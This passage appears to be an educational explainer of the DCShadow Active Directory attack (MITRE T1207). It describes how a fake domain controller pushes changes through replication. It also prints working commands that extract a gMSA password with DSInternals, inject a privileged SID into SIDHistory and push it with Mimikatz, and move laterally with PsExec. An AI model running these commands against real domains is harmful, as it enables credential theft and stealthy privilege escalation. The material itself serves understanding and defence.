**DCShadow** is a post-exploitation technique in which an attacker abuses compromised replication permissions to mimic a domain controller. By doing so, the adversary can push malicious changes into Active Directory (AD) with minimal logging, allowing for stealthy persistence, privilege escalation, or manipulation of AD data.

MITRE ATT&CK ID: T1207

1- Understanding the Attack

• Mechanism:

  DCShadow leverages Active Directory replication protocols (e.g., MS-DRSR) to register a fake domain controller. The attacker then injects changes—such as adding or modifying object attributes (e.g., SIDHistory)—directly into AD. These changes are pushed to a real domain controller by exploiting replication privileges.

  • Active Directory Replication via MS-DRSR

• Stealthiness:

  Because DCShadow pushes changes in a manner that mimics legitimate AD replication, standard logging and SIEM solutions may not immediately flag these modifications, making detection challenging.

2- Steps of a DCShadow Attack

a. Compromise an Account with Administrative Permissions

• Objective:

  Obtain credentials for an AD account with replication rights (e.g., an account with administrative privileges or a Group Managed Service Account).

• Example Commands (PowerShell):

  Install-Module DSInternals -Force
  $GMSAPwd = (Get-ADServiceAccount GMSA1 -Prop msDS-ManagedPassword).'msDS-ManagedPassword'
  ConvertFrom-ManagedPasswordBlob $GMSAPwd | Select-Object -ExpandProperty CurrentPassword
  

b. Mimic a Domain Controller and Inject Malicious Changes

• Part 1: Elevate Privileges and Modify AD Objects

  Using a tool like Mimikatz, the attacker elevates to SYSTEM and makes changes to a replicated object. For example, modifying a user’s SIDHistory to add privileges:

  .\\mimikatz.exe
  mimikatz # lsadump::dcshadow /object:"CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com" /attribute:SidHistory /value:S-1-5-21-441320023-234525631-506766575-512
  

• Part 2: Push Changes to a Real Domain Controller

  Once the modifications are made on the fake DC, the attacker uses the compromised account to push these changes to an actual domain controller:

  .\\mimikatz.exe lsadump::dcshadow /push
  

c. Leverage Injected Changes for Further Objectives

• Result:

  The injected changes (e.g., modified SIDHistory) grant the attacker elevated privileges or domain-wide access. The adversary can then use tools like PsExec to authenticate with the newly escalated account and move laterally.

• Example Command:

  .\\PsExec.exe \\\\dc1.domain.com powershell.exe
  hostname
  

3- Key Tools